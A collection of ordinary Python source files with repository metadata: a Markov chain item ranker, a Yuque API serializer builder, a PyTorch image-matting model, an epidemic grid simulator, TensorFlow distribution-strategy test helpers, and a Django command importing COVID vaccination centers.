d06a5181661f5f73feeb7820ddebac2f55560f7e | 3,491 | py | Python | src/models/markov_chain.py | dballesteros7/master-thesis-2015 | 8c0bf9a6eef172fc8167a30780ae0666f8ea2d88 | [
"MIT"
] | null | null | null | src/models/markov_chain.py | dballesteros7/master-thesis-2015 | 8c0bf9a6eef172fc8167a30780ae0666f8ea2d88 | [
"MIT"
] | null | null | null | src/models/markov_chain.py | dballesteros7/master-thesis-2015 | 8c0bf9a6eef172fc8167a30780ae0666f8ea2d88 | [
"MIT"
] | null | null | null | import itertools
import numpy as np
import constants
from utils import file
class MarkovChain:
def __init__(self, n_items: int, pseudo_count: int = 1,
use_rejection: bool = True):
self.n_items = n_items
self.counts = np.empty(n_items)
self.first_order_counts = np.empty((n_items, n_items))
self.counts.fill((n_items - 1) * pseudo_count)
self.first_order_counts.fill(pseudo_count)
self.use_rejection = use_rejection
np.fill_diagonal(self.first_order_counts, 0) # No self loops.
def train(self, ordered_sets: np.ndarray):
for ordered_set in ordered_sets:
for item, next_item in itertools.zip_longest(
ordered_set, ordered_set[1:]):
if next_item is not None:
self.counts[item] += 1
self.first_order_counts[item][next_item] += 1
def propose_set_item(self, to_complete):
missing_pos = to_complete.index('?')
probs = np.zeros_like(self.first_order_counts)
for idx, row in enumerate(self.first_order_counts):
probs[idx, :] = self.first_order_counts[idx, :] / self.counts[idx]
if missing_pos == 0:
column = probs[:, int(to_complete[missing_pos + 1])]
row = np.ones_like(column)
elif missing_pos == len(to_complete) - 1:
row = probs[:, int(to_complete[missing_pos - 1])]
column = np.ones_like(row)
else:
column = probs[:, int(to_complete[missing_pos + 1])]
row = probs[:, int(to_complete[missing_pos - 1])]
likelihood = column*row
to_complete = [int(x) for x in to_complete if x != '?']
if self.use_rejection:
likelihood[to_complete] = 0.0
sorted_indexes = np.argsort(likelihood)
return sorted_indexes[::-1]
def train_and_evaluate(dataset_name: str, n_items: int):
    """Train MarkovChain rankers on each CV fold and write ranking files.

    For every fold two variants are evaluated: the plain chain ('markov')
    and one that rejects items already in the partial set ('pseudo_markov').

    Args:
        dataset_name: Name used to resolve train/test/output file paths.
        n_items: Size of the item universe passed to MarkovChain.
    """
    for fold in range(1, constants.N_FOLDS + 1):
        for use_rejection in (False, True):
            model = MarkovChain(n_items, use_rejection=use_rejection)
            loaded_data = file.load_set_data(
                constants.TRAIN_DATA_PATH_TPL.format(
                    fold=fold, dataset=dataset_name))
            model.train(loaded_data)
            loaded_test_data = file.load_csv_test_data(
                constants.PARTIAL_DATA_PATH_TPL.format(
                    fold=fold, dataset=dataset_name))
            model_name = 'pseudo_markov' if use_rejection else 'markov'
            target_path = constants.RANKING_MODEL_PATH_TPL.format(
                dataset=dataset_name, fold=fold, model=model_name)
            with open(target_path, 'w') as output_file:
                for subset in loaded_test_data:
                    # Rank candidates once per partial set (a redundant,
                    # discarded second call was removed here).
                    result = model.propose_set_item(subset)
                    output_file.write(','.join(str(item) for item in result))
                    output_file.write('\n')
if __name__ == '__main__':
    # Entry point: evaluate on the 100-item "no singles" dataset.
    train_and_evaluate(constants.DATASET_NAME_TPL.format('100_no_singles'), 100)
    #train_and_evaluate(constants.DATASET_NAME_TPL.format('50_no_singles'), 50)
| 42.573171 | 80 | 0.593813 |
35ea3f9ea341c6518130c325a5265217fc73e6c6 | 1,645 | py | Python | juq/serializer/builder.py | inhzus/juq | 2721f1361eed3d4e7da36d67f924942faef24650 | [
"MIT"
] | 14 | 2019-04-09T23:34:56.000Z | 2022-01-17T14:19:51.000Z | juq/serializer/builder.py | inhzus/juq | 2721f1361eed3d4e7da36d67f924942faef24650 | [
"MIT"
] | null | null | null | juq/serializer/builder.py | inhzus/juq | 2721f1361eed3d4e7da36d67f924942faef24650 | [
"MIT"
] | 4 | 2020-03-29T15:29:59.000Z | 2022-01-17T14:19:44.000Z | # -*- coding: utf-8 -*-
# created by inhzus
import dataclasses
from juq.serializer import *
class SerializerBuilder:
    """Builds serializer dataclass instances from raw Yuque API payloads."""

    # API "_serializer" tag -> serializer dataclass. Several tags share one
    # class (user/group pairs map to the same serializer).
    STR_CLASS_MAP = {
        'v2.book': RepoSerializer,
        'v2.book_toc': RepoTocSerializer,
        'v2.book_detail': RepoDetailSerializer,
        'v2.doc': DocSerializer,
        'v2.doc_detail': DocDetailSerializer,
        'v2.group_user': GroupUserSerializer,
        **dict.fromkeys(('v2.user', 'v2.group'), UserSerializer),
        **dict.fromkeys(('v2.group_detail', 'v2.user_detail'), UserDetailSerializer)
    }

    @staticmethod
    def _gen_serializer(param: dict):
        """Instantiate the serializer named by param['_serializer'].

        When the tag is absent it is inferred from telltale keys
        ('body_html' -> doc detail, 'slug' -> book toc); returns None when
        nothing can be inferred. Fields not declared on the dataclass are
        dropped; declared-but-missing fields default to None.

        NOTE(review): an unknown tag raises KeyError from STR_CLASS_MAP —
        presumably acceptable upstream; confirm against callers.
        """
        if '_serializer' not in param:
            if 'body_html' in param:
                param['_serializer'] = 'v2.doc_detail'
            elif 'slug' in param:
                param['_serializer'] = 'v2.book_toc'
            else:
                return None
        serializer = SerializerBuilder.STR_CLASS_MAP[param['_serializer']]
        field_names = set(f.name for f in dataclasses.fields(serializer))
        # Start every declared field at None, then overlay matching keys.
        candi = {k: None for k in field_names}
        candi.update({k: v for k, v in param.items() if k in field_names})
        return serializer(**candi)

    @staticmethod
    def build(param: dict):
        """Build one serializer (dict payload) or a list (list payload).

        Pops 'data' out of *param*; remaining top-level keys (e.g. meta,
        abilities) are merged into the dict payload before serialization.
        """
        data = param.pop('data')
        if not isinstance(data, dict):
            return [SerializerBuilder._gen_serializer(item) for item in data]
        # data['abilities'] = param['abilities'] if 'abilities' in param else None
        # data['meta'] = param['meta'] if 'meta' in param else None
        data.update(param)
        return SerializerBuilder._gen_serializer(data)
if __name__ == '__main__':
    # Library module: nothing to run directly.
    pass
| 33.571429 | 84 | 0.617629 |
5d8a318502396a8a6a524aa0f2c6a79a05fc153d | 6,961 | py | Python | models.py | vietnamican/Deep-Image-Matting-PyTorch | 3e5cbd5c1038e2bc864010b647522024a5ae4c8b | [
"MIT"
] | 1 | 2021-02-12T13:19:45.000Z | 2021-02-12T13:19:45.000Z | models.py | vietnamican/Deep-Image-Matting-PyTorch | 3e5cbd5c1038e2bc864010b647522024a5ae4c8b | [
"MIT"
] | null | null | null | models.py | vietnamican/Deep-Image-Matting-PyTorch | 3e5cbd5c1038e2bc864010b647522024a5ae4c8b | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from torchsummaryX import summary
from config import device, im_size
class conv2DBatchNormRelu(nn.Module):
    """Conv2d followed by optional BatchNorm2d and optional ReLU."""

    def __init__(
            self,
            in_channels,
            n_filters,
            k_size,
            stride,
            padding,
            bias=True,
            dilation=1,
            with_bn=True,
            with_relu=True
    ):
        super(conv2DBatchNormRelu, self).__init__()
        # Assemble the layer list instead of branching over four
        # Sequential variants; child ordering (conv, bn, relu) is the same.
        layers = [nn.Conv2d(int(in_channels),
                            int(n_filters),
                            kernel_size=k_size,
                            padding=padding,
                            stride=stride,
                            bias=bias,
                            dilation=dilation, )]
        if with_bn:
            layers.append(nn.BatchNorm2d(int(n_filters)))
        if with_relu:
            layers.append(nn.ReLU(inplace=True))
        self.cbr_unit = nn.Sequential(*layers)

    def forward(self, inputs):
        return self.cbr_unit(inputs)
class segnetDown2(nn.Module):
    """Two conv-BN-ReLU layers then a 2x2 max-pool (pool indices kept)."""

    def __init__(self, in_size, out_size):
        super(segnetDown2, self).__init__()
        self.conv1 = conv2DBatchNormRelu(in_size, out_size, k_size=3, stride=1, padding=1)
        self.conv2 = conv2DBatchNormRelu(out_size, out_size, k_size=3, stride=1, padding=1)
        self.maxpool_with_argmax = nn.MaxPool2d(2, 2, return_indices=True)

    def forward(self, inputs):
        features = self.conv2(self.conv1(inputs))
        unpooled_shape = features.size()
        pooled, indices = self.maxpool_with_argmax(features)
        return pooled, indices, unpooled_shape
class segnetDown3(nn.Module):
    """Three conv-BN-ReLU layers then a 2x2 max-pool (pool indices kept)."""

    def __init__(self, in_size, out_size):
        super(segnetDown3, self).__init__()
        self.conv1 = conv2DBatchNormRelu(in_size, out_size, k_size=3, stride=1, padding=1)
        self.conv2 = conv2DBatchNormRelu(out_size, out_size, k_size=3, stride=1, padding=1)
        self.conv3 = conv2DBatchNormRelu(out_size, out_size, k_size=3, stride=1, padding=1)
        self.maxpool_with_argmax = nn.MaxPool2d(2, 2, return_indices=True)

    def forward(self, inputs):
        features = self.conv3(self.conv2(self.conv1(inputs)))
        unpooled_shape = features.size()
        pooled, indices = self.maxpool_with_argmax(features)
        return pooled, indices, unpooled_shape
class segnetUp1(nn.Module):
    """Max-unpool (with stored indices) followed by one conv+BN (no ReLU)."""

    def __init__(self, in_size, out_size):
        super(segnetUp1, self).__init__()
        self.unpool = nn.MaxUnpool2d(2, 2)
        self.conv = conv2DBatchNormRelu(in_size, out_size, k_size=5, stride=1, padding=2, with_relu=False)

    def forward(self, inputs, indices, output_shape):
        upsampled = self.unpool(input=inputs, indices=indices, output_size=output_shape)
        return self.conv(upsampled)
class DIMModel(nn.Module):
    """Deep-Image-Matting encoder-decoder (SegNet-style, VGG16 backbone).

    Input: [N, in_channels, H, W] (RGB + trimap); output: [N, H, W] alpha
    matte squashed to (0, 1) by a sigmoid.
    """

    def __init__(self, n_classes=1, in_channels=4, is_unpooling=True, pretrain=True):
        super(DIMModel, self).__init__()

        self.in_channels = in_channels
        self.is_unpooling = is_unpooling
        self.pretrain = pretrain

        # Encoder: each stage also returns its max-pool indices/shape so the
        # decoder can unpool to the exact pre-pool resolution.
        self.down1 = segnetDown2(self.in_channels, 64)
        self.down2 = segnetDown2(64, 128)
        self.down3 = segnetDown3(128, 256)
        self.down4 = segnetDown3(256, 512)
        self.down5 = segnetDown3(512, 512)

        # Decoder mirrors the encoder stages.
        self.up5 = segnetUp1(512, 512)
        self.up4 = segnetUp1(512, 256)
        self.up3 = segnetUp1(256, 128)
        self.up2 = segnetUp1(128, 64)
        self.up1 = segnetUp1(64, n_classes)
        self.sigmoid = nn.Sigmoid()

        if self.pretrain:
            import torchvision.models as models
            # NOTE(review): models.vgg16() here builds a VGG16 with default
            # (random) initialisation unless pretrained weights are loaded
            # elsewhere — confirm whether pretrained=True was intended.
            vgg16 = models.vgg16()
            self.init_vgg16_params(vgg16)

    def forward(self, inputs):
        """Run encoder + decoder; returns the alpha matte [N, H, W]."""
        # inputs: [N, 4, 320, 320]
        down1, indices_1, unpool_shape1 = self.down1(inputs)
        down2, indices_2, unpool_shape2 = self.down2(down1)
        down3, indices_3, unpool_shape3 = self.down3(down2)
        down4, indices_4, unpool_shape4 = self.down4(down3)
        down5, indices_5, unpool_shape5 = self.down5(down4)

        up5 = self.up5(down5, indices_5, unpool_shape5)
        up4 = self.up4(up5, indices_4, unpool_shape4)
        up3 = self.up3(up4, indices_3, unpool_shape3)
        up2 = self.up2(up3, indices_2, unpool_shape2)
        up1 = self.up1(up2, indices_1, unpool_shape1)

        x = torch.squeeze(up1, dim=1)  # [N, 1, 320, 320] -> [N, 320, 320]
        x = self.sigmoid(x)
        return x

    def init_vgg16_params(self, vgg16):
        """Copy VGG16 conv weights into matching encoder convs.

        Layers are matched positionally; a layer is only copied when both
        weight and bias shapes agree (the first conv differs when
        in_channels != 3 and is therefore skipped).
        """
        blocks = [self.down1, self.down2, self.down3, self.down4, self.down5]

        # (An unused `ranges` table of VGG feature indices was removed.)
        features = list(vgg16.features.children())

        vgg_layers = []
        for _layer in features:
            if isinstance(_layer, nn.Conv2d):
                vgg_layers.append(_layer)

        merged_layers = []
        for idx, conv_block in enumerate(blocks):
            # The first two stages have two convs, the rest have three.
            if idx < 2:
                units = [conv_block.conv1.cbr_unit, conv_block.conv2.cbr_unit]
            else:
                units = [
                    conv_block.conv1.cbr_unit,
                    conv_block.conv2.cbr_unit,
                    conv_block.conv3.cbr_unit,
                ]
            for _unit in units:
                for _layer in _unit:
                    if isinstance(_layer, nn.Conv2d):
                        merged_layers.append(_layer)

        assert len(vgg_layers) == len(merged_layers)
        for l1, l2 in zip(vgg_layers, merged_layers):
            if isinstance(l1, nn.Conv2d) and isinstance(l2, nn.Conv2d):
                if l1.weight.size() == l2.weight.size() and l1.bias.size() == l2.bias.size():
                    l2.weight.data = l1.weight.data
                    l2.bias.data = l1.bias.data
class RefinementModel(nn.Module):
    # Matting refinement head: three conv-BN-ReLU layers over the 4-channel
    # input, a 1-channel projection, sigmoid, then a skip-add of the 4th
    # input channel.
    def __init__(self):
        super(RefinementModel, self).__init__()
        self.conv_1 = conv2DBatchNormRelu(4, 64, 3, 1, 1)
        self.conv_2 = conv2DBatchNormRelu(64,64, 3, 1, 1)
        self.conv_3 = conv2DBatchNormRelu(64,64, 3, 1, 1)
        # Final projection to one channel: no BN, no ReLU before sigmoid.
        self.conv_4 = conv2DBatchNormRelu(64, 1, 3, 1, 1, with_bn=False, with_relu=False)
        self.sigmoid = nn.Sigmoid()

    def forward(self, inputs):
        x = self.conv_1(inputs)
        x = self.conv_2(x)
        x = self.conv_3(x)
        x = self.conv_4(x)
        x = torch.squeeze(x, dim=1)
        x = self.sigmoid(x)
        # Skip connection adds channel 3 of the input — presumably the
        # coarse alpha predicted by DIMModel (TODO confirm). Note the sum
        # can exceed 1.0 since sigmoid output is added on top of it.
        skip = inputs[:,3,:,:]
        x = x + skip
        return x
if __name__ == '__main__':
    # Smoke test: build the model and print a per-layer summary for a batch
    # of four 4-channel 320x320 inputs (requires a CUDA device).
    model = DIMModel().to(device)
    summary(model, torch.Tensor(4, 4, 320, 320).cuda())
| 35.156566 | 110 | 0.591438 |
3c9e481eb32beede327227e8cfd4c2cb73a054d5 | 107 | py | Python | paranormal-pioneers/project/langs/forth/__init__.py | python-discord/code-jam-6 | a7eb3b1256ae113c93f0337892c667768e8bc199 | [
"MIT"
] | 76 | 2020-01-17T12:09:48.000Z | 2022-03-26T19:17:26.000Z | paranormal-pioneers/project/langs/forth/__init__.py | Hypertyz/code-jam-6 | a7eb3b1256ae113c93f0337892c667768e8bc199 | [
"MIT"
] | 17 | 2020-01-21T23:13:34.000Z | 2020-02-07T00:07:04.000Z | paranormal-pioneers/project/langs/forth/__init__.py | Hypertyz/code-jam-6 | a7eb3b1256ae113c93f0337892c667768e8bc199 | [
"MIT"
] | 91 | 2020-01-17T12:01:06.000Z | 2022-03-22T20:38:59.000Z | from project.langs.forth.forthimpl import create_forth, forth_compile, launch_repl
# Module-level singleton interpreter shared by the package.
forth = create_forth()
| 26.75 | 82 | 0.831776 |
21f772022c4ddc7c10002db5adb9737e170442ba | 6,029 | py | Python | .history/src/Simulador_20200708133514.py | eduardodut/Trabalho_final_estatistica_cd | fbedbbea6bdd7a79e1d62030cde0fab4e93fc338 | [
"MIT"
] | null | null | null | .history/src/Simulador_20200708133514.py | eduardodut/Trabalho_final_estatistica_cd | fbedbbea6bdd7a79e1d62030cde0fab4e93fc338 | [
"MIT"
] | null | null | null | .history/src/Simulador_20200708133514.py | eduardodut/Trabalho_final_estatistica_cd | fbedbbea6bdd7a79e1d62030cde0fab4e93fc338 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
from Matriz_esferica import Matriz_esferica
from Individuo import Individuo, Fabrica_individuo
import random
from itertools import permutations
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
class Simulador():
    """SIR-like epidemic simulator on a wrap-around ("spherical") grid.

    Each cell of an n x n pandas DataFrame holds one Individuo; parallel
    lists track the (x, y) coordinates of infected individuals and a numpy
    matrix mirrors their status codes.
    """

    def __init__(
            self,
            tamanho_matriz,            # number of rows/columns of the grid
            percentual_inicial_tipo1,  # initial fraction infected as type 1
            percentual_inicial_tipo2,  # initial fraction infected as type 2
            chance_infeccao,           # chance a type-2 infects a healthy individual
            chance_infeccao_tipo2,     # chance an infected becomes contagious
            chance_morte,              # chance a type-2 dies at the end of an update
            atualizacoes_cura):        # updates required to cure a type-1/2 individual

        self.num_atualizacoes = 0
        self.individuos_infectados_tipo_2 = []
        self.individuos_infectados_tipo_1 = []
        self.individuos_infectados_curados = []
        self.individuos_infectados_mortos = []
        self.lista_matrizes_posicionamento = []
        self.matriz_status = np.zeros([tamanho_matriz,tamanho_matriz])

        self.fabrica_individuo = Fabrica_individuo(
            chance_infeccao,
            chance_infeccao_tipo2,
            chance_morte,
            atualizacoes_cura)

        # Grid of Individuo objects, initially all healthy.
        self.matriz_individuos = pd.DataFrame(columns=range(tamanho_matriz), index=range(tamanho_matriz))
        self.matriz_individuos.loc[:] = self.fabrica_individuo.criar_individuo(Individuo.SADIO,(0,0))
        self.matriz_status[:] = Individuo.SADIO
        # Validates movement on the wrap-around n x n grid.
        self.matriz_esferica = Matriz_esferica(tamanho_matriz)

        self.populacao_inicial = int(tamanho_matriz**2)
        self.num_inicial_tipo2 = int(self.populacao_inicial * percentual_inicial_tipo2)
        self.num_inicial_tipo1 = int(self.populacao_inicial * percentual_inicial_tipo1)
        self.num_inicial_sadios = self.populacao_inicial - (self.num_inicial_tipo2 + self.num_inicial_tipo1)
        self.popular(tamanho_matriz)

        # Renamed from `dict`, which shadowed the builtin.
        contagem_inicial = {
            'num_sadios': self.num_inicial_sadios,
            'num_infect_t1': self.num_inicial_tipo1,
            'num_infect_t2': self.num_inicial_tipo2,
            'num_curados': 0,
            'num_mortos': 0}
        # DataFrame accumulating the counters of each update step.
        self.dataframe = pd.DataFrame(contagem_inicial, index=[0])
        # self.salvar_posicionamento()

    def get_status_individuo(self, individuo: Individuo):
        """Return the status code of a single individual.

        (An identical duplicate definition that used to appear later in the
        class was removed.)
        """
        return individuo.status

    def get_status_coluna(self, serie: pd.Series):
        """Map one DataFrame column of Individuo objects to status codes."""
        return serie.apply(self.get_status_individuo)

    def salvar_posicionamento(self):
        """Snapshot the current status grid as a numpy array."""
        # NOTE(review): a second append of
        # `self.matriz_individuos.apply(self.get_status_individuo)` was
        # removed — `apply` passes a whole Series to the callable, which has
        # no `.status`, so that line could never have worked.
        self.lista_matrizes_posicionamento.append(self.matriz_individuos.apply(self.get_status_coluna).to_numpy())

    def popular(self, tamanho_matriz):
        """Place the initial type-1 and type-2 infected on random cells."""
        # All (x, y) index pairs of the grid. `permutations` excludes the
        # diagonal cells (i, i), mirroring the original behaviour.
        permutacoes = permutations(list(range(tamanho_matriz)),2)
        lista_indices = list(permutacoes)
        random.shuffle(lista_indices)

        # Fix: each individual consumes exactly one (x, y) pair. The old
        # code popped two tuples per individual and mixed their
        # coordinates, which could place two individuals on the same cell.
        ind_x, ind_y = lista_indices.pop()
        self.matriz_individuos.loc[ind_x,ind_y] = self.fabrica_individuo.criar_individuo(Individuo.INFECTADO_TIPO_1,(ind_x,ind_y))
        self.individuos_infectados_tipo_1.append((ind_x,ind_y))
        self.matriz_status[ind_x,ind_y] = Individuo.INFECTADO_TIPO_1

        # Remaining type-1 infected (the first one was created above).
        for _ in range(1, self.num_inicial_tipo1):
            ind_x, ind_y = lista_indices.pop()
            self.matriz_individuos.loc[ind_x,ind_y] = self.fabrica_individuo.criar_individuo(Individuo.INFECTADO_TIPO_1,(ind_x,ind_y))
            self.individuos_infectados_tipo_1.append((ind_x,ind_y))

        # Type-2 infected.
        for _ in range(self.num_inicial_tipo2):
            ind_x, ind_y = lista_indices.pop()
            self.matriz_individuos.loc[ind_x,ind_y] = self.fabrica_individuo.criar_individuo(Individuo.INFECTADO_TIPO_2,(ind_x,ind_y))
            self.individuos_infectados_tipo_2.append((ind_x,ind_y))

    def mover_infectado(self, individuo: Individuo):
        """Move one infected individual on the grid (not implemented yet)."""
        pos_x, pos_y = individuo.posicao[0], individuo.posicao[1]
        pass
# Demo run: 10x10 grid, 1% initially infected as type 1, none as type 2.
chance_infeccao = 0.3
chance_infeccao_tipo2 = 0.2
chance_morte = 0.2
atualizacoes_cura = 10
percentual_inicial_tipo1 = 0.01
percentual_inicial_tipo2 = 0.00

sim = Simulador(
    10,
    percentual_inicial_tipo1,
    percentual_inicial_tipo2,
    chance_infeccao,
    chance_infeccao_tipo2,
    chance_morte,atualizacoes_cura)
#print(sim.lista_matrizes_posicionamento[0])
# Print the initial coordinates of each infected group.
print(sim.individuos_infectados_tipo_2)
print(sim.individuos_infectados_tipo_1)

#cmap = ListedColormap(['w', 'y', 'yellow', 'red'])
#plt.matshow(sim.matriz_individuos, cmap = cmap);plt.show();
| 39.927152 | 134 | 0.663958 |
31d74902903d8bc61abdb777c98ea4416f0edd60 | 8,117 | py | Python | tensorflow/contrib/distribute/python/strategy_test_lib.py | Little-kangaroo/tensorflow | 8dd83e34a00d051bb444b0474096d4f468a13663 | [
"Apache-2.0"
] | 1 | 2019-09-15T09:42:06.000Z | 2019-09-15T09:42:06.000Z | tensorflow/contrib/distribute/python/strategy_test_lib.py | Little-kangaroo/tensorflow | 8dd83e34a00d051bb444b0474096d4f468a13663 | [
"Apache-2.0"
] | null | null | null | tensorflow/contrib/distribute/python/strategy_test_lib.py | Little-kangaroo/tensorflow | 8dd83e34a00d051bb444b0474096d4f468a13663 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Library for testing DistributionStrategy descendants."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.distribute import reduce_util
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.layers import core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.training import distribution_strategy_context
from tensorflow.python.training import optimizer
class _TestException(Exception):
  """Marker exception used to verify that errors propagate across replicas."""
  pass


# May be the argument to either distribution.call_for_each_replica() or
# get_replica_context().merge_call()
def _raise_exception_fn(_=None):
  raise _TestException()


# Must be the argument to a distribution.call_for_each_replica() call, calls a
# get_replica_context().merge_call() that raises an exception.
def _merge_raises_fn():
  distribution_strategy_context.get_replica_context().merge_call(
      _raise_exception_fn)


# Must be the argument to a get_replica_context().merge_call() call, calls
# dist.call_for_each_replica() with a function that raises an exception.
def _call_raises_fn(dist):
  dist.call_for_each_replica(_raise_exception_fn)


# Must be the argument to a distribution.call_for_each_replica() call,
# calls a get_replica_context().merge_call() that calls a
# call_for_each_replica() that raises an exception.
def _merge_call_raises_fn():
  distribution_strategy_context.get_replica_context().merge_call(
      _call_raises_fn)


# Must be the argument to a get_replica_context().merge_call() call, calls
# dist.call_for_each_replica() with a function that calls a
# get_replica_context().merge_call() that raises an exception.
def _call_merge_raises_fn(dist):
  dist.call_for_each_replica(_merge_raises_fn)


# Must be the argument to a distribution.call_for_each_replica() call, calls a
# get_replica_context().merge_call() that calls a call_for_each_replica() that
# calls a get_replica_context().merge_call() that raises an exception.
def _merge_call_merge_raises_fn():
  distribution_strategy_context.get_replica_context().merge_call(
      _call_merge_raises_fn)
class DistributionTestBase(test.TestCase):
  """Some tests that should work with any DistributionStrategy."""

  def _test_minimize_loss_eager(self, d):
    """Eagerly minimize (w*1 - 1)^2 under strategy `d`; error must shrink."""
    with d.scope():
      l = core.Dense(1, use_bias=False)

      def loss(x):
        # TODO(josh11b): What if this constant was instead a captured
        # value? Would it need to be a value that has been passed
        # through d.broadcast()?
        y = array_ops.reshape(l(x), []) - constant_op.constant(1.)
        return y * y

      # TODO(isaprykin): Extract implicit_grad+get_filtered_grad_fn into a
      # common `implicit_grad` function and put it in DistributionStrategy.
      grad_fn = backprop.implicit_grad(loss)
      grad_fn = optimizer.get_filtered_grad_fn(grad_fn)

      def update(v, g):
        # Plain SGD step with a fixed 0.2 learning rate.
        return v.assign_sub(0.2 * g)

      one = d.broadcast(constant_op.constant([[1.]]))

      def step():
        """Perform one optimization step."""
        # Run forward & backward to get gradients, variables list.
        g_v = d.call_for_each_replica(grad_fn, args=(one,))

        # Update the variables using the gradients and the update() function.
        before_list = []
        after_list = []
        for g, v in g_v:
          fetched = d.read_var(v)
          before_list.append(fetched)
          # control_dependencies irrelevant but harmless in eager execution
          with ops.control_dependencies([fetched]):
            g = d.reduce(reduce_util.ReduceOp.SUM, g, destinations=v)
            with ops.control_dependencies(d.update(
                v, update, g, grouped=False)):
              after_list.append(d.read_var(v))
        return before_list, after_list

      for i in range(10):
        b, a = step()
        if i == 0:
          before, = b  # pylint: disable=unbalanced-tuple-unpacking
          after, = a  # pylint: disable=unbalanced-tuple-unpacking

      # Compare the very first "before" snapshot with the last "after".
      error_before = abs(before.numpy() - 1)
      error_after = abs(after.numpy() - 1)
      # Error should go down
      self.assertLess(error_after, error_before)

  def _test_minimize_loss_graph(self, d, soft_placement=False,
                                learning_rate=0.2):
    """Graph-mode variant of _test_minimize_loss_eager."""
    config = config_pb2.ConfigProto()
    config.allow_soft_placement = soft_placement
    config.gpu_options.per_process_gpu_memory_fraction = 0.3
    with context.graph_mode(), \
         ops.Graph().as_default(), \
         self.cached_session(config=config) as sess, \
         d.scope():
      l = core.Dense(1, use_bias=False)

      def loss(x):
        # TODO(josh11b): What if this constant was instead a captured
        # value? Would it need to be a value that has been passed
        # through d.broadcast()?
        y = array_ops.reshape(l(x), []) - constant_op.constant(1.)
        return y * y

      grad_fn = backprop.implicit_grad(loss)

      def update(v, g):
        return v.assign_sub(learning_rate * g)

      one = d.broadcast(constant_op.constant([[1.]]))

      def step():
        """Perform one optimization step."""
        # Run forward & backward to get gradients, variables list.
        g_v = d.call_for_each_replica(grad_fn, args=(one,))

        # Update the variables using the gradients and the update() function.
        before_list = []
        after_list = []
        for g, v in g_v:
          fetched = d.read_var(v)
          before_list.append(fetched)
          with ops.control_dependencies([fetched]):
            g = d.reduce(reduce_util.ReduceOp.SUM, g, destinations=v)
            with ops.control_dependencies(d.update(
                v, update, g, grouped=False)):
              after_list.append(d.read_var(v))
        return before_list, after_list

      # The graph is built once; sess.run re-executes it each iteration.
      before_out, after_out = step()
      variables.global_variables_initializer().run()
      for i in range(10):
        b, a = sess.run((before_out, after_out))
        if i == 0:
          before, = b
          after, = a

      error_before = abs(before - 1)
      error_after = abs(after - 1)
      # Error should go down
      self.assertLess(error_after, error_before)

  def _test_replica_id(self, d):
    """Check every replica runs exactly once with a distinct replica_id."""
    with d.scope():
      expected_devices = [False] * len(d.worker_devices)

      def mark_devices_fn():
        replica_id = (
            distribution_strategy_context.get_replica_context().replica_id)
        self.assertLess(replica_id, len(d.worker_devices))
        self.assertFalse(expected_devices[replica_id])
        expected_devices[replica_id] = True

      d.call_for_each_replica(mark_devices_fn)
      self.assertAllEqual(expected_devices, [True] * len(d.worker_devices))

  def _test_call_and_merge_exceptions(self, dist):
    """Exceptions raised at any call/merge nesting depth must propagate."""
    with dist.scope():
      with self.assertRaises(_TestException):
        dist.call_for_each_replica(_raise_exception_fn)
      with self.assertRaises(_TestException):
        dist.call_for_each_replica(_merge_raises_fn)
      with self.assertRaises(_TestException):
        dist.call_for_each_replica(_merge_call_raises_fn)
      with self.assertRaises(_TestException):
        dist.call_for_each_replica(_merge_call_merge_raises_fn)
e61eb819a6972dc05b4417e2c62e91fe48b9220a | 1,141 | py | Python | erp/management/commands/import_centres_vaccination.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | null | null | null | erp/management/commands/import_centres_vaccination.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | null | null | null | erp/management/commands/import_centres_vaccination.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | null | null | null | import sys
from django.core.management.base import BaseCommand
from erp.jobs.import_centres_vaccination import ImportVaccinationsCenters
def fatal(msg):
    """Print *msg* and abort the command with exit status 1."""
    print(msg)
    raise SystemExit(1)
class Command(BaseCommand):
    """Management command importing the COVID vaccination centers dataset."""

    help = "Importe les centres de vaccination COVID"

    def add_arguments(self, parser):
        parser.add_argument(
            "--dataset-url",
            type=str,
            help="URL directe du jeu de données à importer",
        )
        parser.add_argument(
            "--verbose",
            action="store_true",
            help="Afficher les erreurs",
        )
        parser.add_argument(
            "--scheduler",
            action="store_true",
            help="Job: Execute et envoi un mail en fin d'opération",
        )

    def handle(self, *args, **options):  # noqa
        """Run the import job; RuntimeError from the job aborts the command."""
        self.stdout.write("Importation des centres de vaccination")
        try:
            ImportVaccinationsCenters(options["scheduler"]).job(
                # Bug fix: argparse stores "--dataset-url" under the key
                # "dataset_url" (dashes become underscores), so the old
                # lookup of "dataset-url" always fell back to "".
                dataset_url=options.get("dataset_url") or "",
                verbose=options["verbose"],
            )
        except RuntimeError as err:
            fatal(err)
| 27.166667 | 73 | 0.583699 |
160bf7f5d19b6e05d504df90bca7be9ea7214f03 | 2,489 | py | Python | examples/spiral.py | miskcoo/kscore | 80aef7e2cab26c81392e2526437247e2a8c295e4 | [
"MIT"
] | 35 | 2020-05-21T16:55:32.000Z | 2022-03-25T02:54:11.000Z | examples/spiral.py | miskcoo/kscore | 80aef7e2cab26c81392e2526437247e2a8c295e4 | [
"MIT"
] | null | null | null | examples/spiral.py | miskcoo/kscore | 80aef7e2cab26c81392e2526437247e2a8c295e4 | [
"MIT"
] | 2 | 2021-06-14T21:32:57.000Z | 2021-06-29T18:29:13.000Z | #!/usr/bin/env python
